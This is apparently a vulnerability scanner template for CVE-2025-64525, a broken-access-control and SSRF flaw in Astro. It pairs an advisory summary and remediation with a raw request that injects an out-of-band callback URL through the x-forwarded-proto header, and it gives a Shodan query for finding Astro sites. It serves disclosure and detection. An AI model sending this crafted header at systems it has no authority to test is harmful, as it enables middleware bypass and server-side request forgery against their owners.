Astro 2.16.0 to 5.15.5 contains a broken access control caused by insecure use of unsanitized x-forwarded-proto and x-forwarded-port headers in URL building, letting attackers bypass middleware protection, cause DoS, SSRF, and URL pollution, exploit requires crafted headers.
PoC代码[已公开]
id: CVE-2025-64525
info:
name: Astro - Broken Access Control
author: zhero___,DhiyaneshDK
severity: medium
description: |
Astro 2.16.0 to 5.15.5 contains a broken access control caused by insecure use of unsanitized x-forwarded-proto and x-forwarded-port headers in URL building, letting attackers bypass middleware protection, cause DoS, SSRF, and URL pollution, exploit requires crafted headers.
impact: |
Attackers can bypass route protection, cause denial of service, perform SSRF, and pollute URLs leading to security bypasses and potential XSS.
remediation: |
Update to version 5.15.5 or later.
reference:
- https://github.com/advisories/GHSA-hr2q-hp5q-x767
- https://zhero-web-sec.github.io/research-and-things/astro-framework-and-standards-weaponization
metadata:
verified: true
max-request: 1
shodan-query: html:"_astro"
tags: cve,cve2025,astro,ssrf,oast,oob
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
x-forwarded-proto: http://{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Astro-Middleware"
- "User-Agent: node"
condition: or
# digest: 4b0a00483046022100e0b21b0b15c9e23adc131fa3139ad516193ba851e191d6db1996966a60078898022100e546e0623d48152d7aa9b2f4a588e31cc1f731557623fe29d177517c90d7316e:922c64590222798bb761d5b6d8e72950